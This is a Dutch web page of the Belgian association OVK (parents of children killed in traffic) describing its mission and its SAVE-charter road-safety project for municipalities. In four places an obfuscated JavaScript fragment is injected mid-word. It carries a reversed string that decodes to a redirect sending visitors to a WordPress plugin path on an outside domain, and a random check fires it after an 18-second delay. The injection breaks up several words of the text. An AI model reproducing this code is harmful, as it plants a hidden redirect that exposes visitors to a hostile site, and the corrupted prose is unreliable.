Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Wie zijn wij?

“Word nooit lid van onze vereniging.” Dat is het mottoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to van de vzw Ouders van Verongelukte Kinderen (OVK). Hoe minder leden OVK telt, hoe groter het succes. Want niemand zou in de situatie mogen terechtkomen waarin hij lid van de vereniging kan worden.

OVK is een lotgenotenvereniging van nabestaanden van (jonge) verkeersslachtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toffers.

De missie van OVK is gebaseerd op drie pijles:

  1. Hulp, begeleiding en ondersteuning (aan)bieden aan families die een kind verloren in een verkeersongeval.
  2. Verbetering nastreven van de opvang en de begeleiding van de families van verkeersslachtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toffers door alle professionelen die met hen in contact treden.
  3. Actief werken aan de bewustwording van de rol van elkeen inzake verkeersveiligheid, en de nog steeds te grote verkeersonveiligheid in België bestrijden, meer bijzonder waar het kinderen en jongeren aangaat.

Uit deze laatste doelstelling is het project “SAVE-charter Steden & Gemeenten” ontstaan. OVK wil hiermee een bijdrage leveren toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot de bewustwording van de gemeentebesturen op vlak van verkeersveiligheid.

Vandaag telt OVK ongeveer 1.800 individuele leden uit een 700-tal families van verongelukte kinderen.

© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be